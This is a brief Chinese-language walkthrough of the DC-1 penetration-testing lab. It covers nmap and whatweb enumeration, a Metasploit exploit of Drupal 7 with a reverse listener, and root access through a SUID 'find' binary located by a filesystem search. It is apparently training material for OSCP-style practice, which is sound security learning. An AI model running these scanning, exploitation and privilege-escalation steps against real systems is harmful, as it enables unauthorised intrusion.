DC-1 | Easy-Easy
一、枚举/信息搜集
首先,常规nmap扫描
nmap -p- -A $IP
简单分析下扫描结果,其中开放了22、80、111、40238端口,看起来好像没有什么突破点,但是我们能发现80端口上的信息比较多,那我们直接搞起来
这里能看出来网站的默认CMS为Drupal,再开whatweb扫描
版本号为7,很舒服,那这里就有两个思路,要么找公开漏洞或msf一把梭,没时间废话,直接一把梭
二、权限获取
msf搜一下,这里我们用第一个(use 1)
options //查看需要的设置 set RHOSTS $ip //设置目标 set LHOST $ip //设置监听 run //跑起来
三、权限提升
构造搜寻有sudo命令的内容:
find / -perm -u=s -type f 2>/dev/null
这里找到了find命令,送分局了属于是,GTFO梭
Root shell get
四、复盘
很简单,没得说,之后将日更一段时间打靶内容,oscp向,可以来一波,一起打靶:Day1:Empire-breakout | Easy-Hard Proving ground play